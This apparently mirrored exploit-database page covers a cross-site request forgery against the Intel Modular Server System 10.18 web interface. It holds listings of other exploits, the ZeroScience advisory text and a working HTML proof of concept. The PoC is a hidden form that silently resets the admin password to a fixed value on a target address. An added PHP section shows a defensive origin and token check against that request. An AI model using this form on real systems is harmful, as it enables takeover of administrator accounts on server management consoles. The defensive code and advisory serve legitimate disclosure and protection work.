"Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)"

Author: LiquidWorm
Platform: php
Release date: 2019-03-14

Release Date Title Type Platform Author
2019-03-18 "TheCarProject v2 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-15 "Moodle 3.4.1 - Remote Code Execution" webapps php "Darryn Ten"
2019-03-15 "Laundry CMS - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-15 "Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities" webapps php "Gionathan Reale"
2019-03-15 "ICE HRM 23.0 - Multiple Vulnerabilities" webapps php "Mehmet EMIROGLU"
2019-03-15 "CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload" webapps php "Daniele Scanu"
2019-03-14 "Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution" webapps php R3zk0n
2019-03-14 "Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)" webapps php LiquidWorm
2019-03-13 "pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting" webapps php "Gionathan Reale"
2019-03-13 "WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion" webapps php "Manuel García Cárdenas"
2019-03-13 "elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)" remote php Metasploit
2019-03-12 "PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)" webapps php "Gionathan Reale"
2019-03-11 "Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution" webapps php redtimmysec
2019-03-08 "DirectAdmin 1.55 - 'CMD_ACCOUNT_ADMIN' Cross-Site Request Forgery" webapps php ManhNho
2019-12-12 "phpBB 3.2.3 - Remote Code Execution" webapps php allyshka
2019-03-01 "WordPress Core 5.0 - Remote Code Execution" webapps php allyshka
2019-03-07 "Kados R10 GreenBee - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-05 "OpenDocMan 1.3.4 - 'search.php where' SQL Injection" webapps php "Mehmet EMIROGLU"
2019-03-07 "Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)" remote php Metasploit
2019-03-04 "WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities" webapps php ed0x21son
2019-03-04 "Craft CMS 3.1.12 Pro - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2019-03-04 "Bolt CMS 3.6.4 - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2019-03-04 "elFinder 2.1.47 - Command Injection vulnerability in the PHP connector" webapps php q3rv0
2019-03-04 "CMSsite 1.0 - Multiple Cross-Site Request Forgery" webapps php "Mr Winst0n"
2019-03-04 "OOP CMS BLOG 1.0 - Multiple Cross-Site Request Forgery" webapps php "Mr Winst0n"
2019-03-04 "OOP CMS BLOG 1.0 - Multiple SQL Injection" webapps php "Mr Winst0n"
2019-03-04 "Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)" webapps php AkkuS
2019-03-04 "zzzphp CMS 1.6.1 - Cross-Site Request Forgery" webapps php "Yang Chenglong"
2019-02-28 "Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)" webapps php AkkuS
2019-02-28 "Joomla! Component J2Store < 3.3.7 - SQL Injection" webapps php "Andrei Conache"
Release Date Title Type Platform Author
2019-03-14 "Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)" webapps php LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "BEWARD Intercom 2.3.1 - Credentials Disclosure" local windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection" webapps windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery" webapps windows LiquidWorm
2018-11-30 "Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass" webapps cgi LiquidWorm
2018-11-21 "Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2018-11-05 "Microsoft Internet Explorer 11 - Null Pointer Dereference" local windows LiquidWorm
2018-10-17 "TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2018-10-08 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure" webapps hardware LiquidWorm
2018-10-06 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-06-25 "Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps hardware LiquidWorm
2018-06-25 "Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps hardware LiquidWorm
2018-06-25 "Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps linux LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-05-21 "Teradek Slice 7.3.15 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek Cube 7.3.6 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery" webapps hardware LiquidWorm
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46541/?format=json')
<!--

Intel Modular Server System 10.18 CSRF Change Admin Password Exploit


Vendor: Intel Corporation
Product web page: https://www.intel.com
Affected version: 10.18.100.20130627.38849
                  5.5.100.20091202.19584

Summary: The Intel Modular Server System is a blade system manufactured by
Intel using their own motherboards and processors. The Intel Modular Server
System consists of an Intel Modular Server Chassis, up to six diskless Compute
Blades, an integrated storage area network (SAN), and three to five Service
Modules.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: lighttpd/1.4.30
           lighttpd/1.4.21
           PHP/5.3.10
           PHP/5.2.2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5514
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5514.php


11.03.2019

-->


<html>
  <body>
  <script>history.pushState('', 't00t', 'index.php')</script>
    <form action="https://192.168.1.17:444/users/?table=User&UserId=1&action=edit&template=none" method="POST">
      <input type="hidden" name="_dbTable[User][1][UserId]" value="1" />
      <input type="hidden" name="_dbTable[User][1][Username]" value="admin" />
      <input type="hidden" name="_dbTable[User][1][AuthMethod]" value="Local" />
      <input type="hidden" name="_dbTable[User][1][Password][update]" value="on" />
      <input type="hidden" name="_dbTable[User][1][Password][new]" value="(ontrol!23" />
      <input type="hidden" name="_dbTable[User][1][Password][confirm]" value="(ontrol!23" />
      <input type="hidden" name="_dbTable[User][1][AlertEmail]" value="lab@zeroscience.mk" />
      <input type="hidden" name="_dbTable[User][1][CriticalEmail]" value="" />
      <input type="hidden" name="_dbTable[User][1][Phone]" value="031-337-101" />
      <input type="hidden" name="_dbTable[User][1][Locked]" value="0" />
      <input type="hidden" name="action" value="Update" />
      <input type="hidden" name="_dbTable[UserRights][21][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][22][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][23][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][24][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][25][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][26][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][27][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][28][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][29][Alerts]" value="3" />
      <input type="hidden" name="_dbTable[UserRights][247][Alerts]" value="3" />
      <input type="hidden" name="DbTable" value="User" />
      <input type="hidden" name="DbTableKey" value="1" />
      <input type="submit" value="Do et!" />
    </form>
  </body>
</html>
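
The description above attributes the flaw to state-changing requests being accepted without any validity check. The PHP below is an added example, not code from the advisory or from the Intel product: a server-side guard for the user-edit POST that the form above forges, checking the request origin, a per-session token and the presence of the current password. The function names and the `csrf_token` and `Password[current]` fields are assumptions; the `_dbTable[...]` field names and the origin `https://192.168.1.17:444` are taken from the PoC.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical guard, not the vendor's code.
/** Issue one random token per session; the edit form embeds it as csrf_token. */
function csrf_issue(array &$session): string
{
    $session['csrf_token'] ??= bin2hex(random_bytes(32));
    return $session['csrf_token'];
}

/** Return null if the user-edit request may proceed, else the refusal reason. */
function check_user_edit(array $server, array $post, array $session, string $ownOrigin): ?string
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return 'state change must use POST';
    }
    // 1. Origin check: browsers attach Origin to cross-site POSTs; Referer is the fallback.
    $p = parse_url($server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '');
    $origin = isset($p['scheme'], $p['host'])
        ? $p['scheme'] . '://' . $p['host'] . (isset($p['port']) ? ':' . $p['port'] : '')
        : '';
    if ($origin !== $ownOrigin) {
        return 'cross-origin or missing Origin/Referer';
    }
    // 2. Per-session secret that a page on another site cannot read or guess.
    $sent  = $post['csrf_token'] ?? '';
    $known = $session['csrf_token'] ?? '';
    if (!is_string($sent) || $known === '' || !hash_equals($known, $sent)) {
        return 'missing or wrong CSRF token';
    }
    // 3. Password changes need the current password too (hypothetical field; verify it later).
    $users = $post['_dbTable']['User'] ?? [];
    foreach (is_array($users) ? $users : [] as $id => $row) {
        $pw = is_array($row) ? ($row['Password'] ?? []) : [];
        if (($pw['update'] ?? '') === 'on' && empty($pw['current'])) {
            return "password change for user $id lacks current password";
        }
    }
    return null;
}

// Constructed demo: the PoC's POST as the server would receive it.
$session = [];
csrf_issue($session);
$forged = ['_dbTable' => ['User' => [1 => ['Password' =>
    ['update' => 'on', 'new' => 'x', 'confirm' => 'x']]]]];
$server = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://attacker.example'];
var_dump(check_user_edit($server, $forged, $session, 'https://192.168.1.17:444'));
```

The forged request is refused at the origin check; even with that check removed it would fail on the missing token, since the PoC form carries none.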